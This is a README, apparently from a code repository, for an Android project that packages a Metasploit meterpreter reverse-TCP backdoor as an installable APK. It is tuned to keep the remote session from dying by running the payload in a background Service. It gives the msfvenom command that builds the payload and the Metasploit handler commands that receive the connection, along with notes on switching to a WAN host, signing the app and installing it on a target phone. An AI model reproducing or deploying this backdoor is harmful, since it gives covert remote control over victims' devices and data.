
Android backdoored app, improved source code of msfvenom android .apk

Primary LanguageJava


This Android Studio project contains the source code of the backdoored .apk generated by

$msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > result.apk

(in Kali linux suite)

For an procedure guide of penetration into an Android system, please visit my website (Italian only) https://dragonitesec.wordpress.com/2016/11/06/tutorial-come-penetrare-in-un-telefono-android/

Tries to solve the issue:

[*]Meterpreter session x closed - Reason:died

message, by starting payload in a Service. Meterpreter session is more stable in this way (original msfvenom apk often causes session to die very soon)

In this project the backdoor works in LAN settings, opening a meterpreter session to on port 4444 (this settings can be changed in Payload.java file if you want to work in a WAN) The control server must be executing handler exploit with Metasploit, with following commands:

$use exploit/multi/handler
$set payload android/meterpreter/reverse_tcp
$set LHOST
$set LPORT 4444

after the metasploit machine is waiting, the .apk can be installed and launched on the android terminal.

Remember to sign the .apk with a key before installing

Tested on Samsung Galaxy S6 - Lollipop